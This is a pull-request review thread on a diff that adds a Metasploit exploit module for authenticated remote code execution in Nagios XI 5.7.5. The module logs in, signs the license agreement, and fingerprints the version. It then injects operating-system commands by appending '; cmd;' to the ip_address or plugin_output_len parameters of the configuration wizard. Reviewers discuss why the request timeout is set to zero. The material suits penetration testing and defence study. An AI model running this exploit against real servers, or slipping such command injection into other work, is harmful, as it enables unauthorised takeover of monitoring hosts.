modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb

```diff
@@ -0,0 +1,195 @@
+    if login_result == 5 # the Nagios XI license agreement has not been signed
+      auth_cookies, nsp = res_array
+      sign_license_result = sign_license_agreement(auth_cookies, nsp)
+      if sign_license_result
+        return CheckCode::Unknown(sign_license_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3
+        return CheckCode::Unknown(res_array[0])
+      when 5 # the Nagios XI license agreement still has not been signed
+        return CheckCode::Detected('Failed to sign the license agreement.')
+      end
+    end
+
+    print_good('Successfully authenticated to Nagios XI')
+
+    # Obtain the Nagios XI version
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+    @nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)[0][0]
+
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+    end
+
+    print_status("Target is Nagios XI with version #{nagios_version}")
+
+    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
+      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+    end
+
+    # check if the target is actually vulnerable
+    version = Rex::Version.new(nagios_version)
+    if version == Rex::Version.new('5.7.5')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    # execute payload based on the selected URL Parameter
+    url_params = {
+      'update' => 1,
+      'nsp' => @nsp
+    }
+    if datastore['TARGET_URL_PARAM'] == 'ip_address'
+      url_params = url_params.merge({
+        datastore['TARGET_URL_PARAM'] => "127.0.0.1; #{cmd};",
+        'nextstep' => 4,
+        'wizard' => 'digitalocean'
+      })
+    elsif datastore['TARGET_URL_PARAM'] == 'plugin_output_len'
+      url_params = url_params.merge({
+        'nextstep' => 3,
+        'wizard' => 'windowswmi',
+        'check_wmic_plus_ver' => '1.65',
+        'ip_address' => Rex::Text.rand_text_alpha(7..15),
+        'domain' => Rex::Text.rand_text_alpha(7..15),
+        'username' => Rex::Text.rand_text_alpha(7..20),
+        'password' => Rex::Text.rand_text_alpha(7..20),
+        datastore['TARGET_URL_PARAM'] => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
+      })
+    else
+      fail_with(Failure::BadConfig, 'Invalid TARGET_URL_PARAM: Choose ip_address or plugin_output_len')
+    end
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/nagiosxi/config/monitoringwizard.php',
+      'cookie' => @auth_cookies,
+      'vars_get' => url_params
+    }, 0)
```

Comment:
Why is the timeout for this command being set to 0? That seems odd.

Reply:
When the RCE hits, the http response is never sent back to us. So there's no need for a timeout because we don't expect a response

Reply:
Ah thanks, I might add a comment into here for context since that is useful information to have. I agree on the current settings though 👍

Reply:
Will add a comment in here for additional context. Marking as resolved.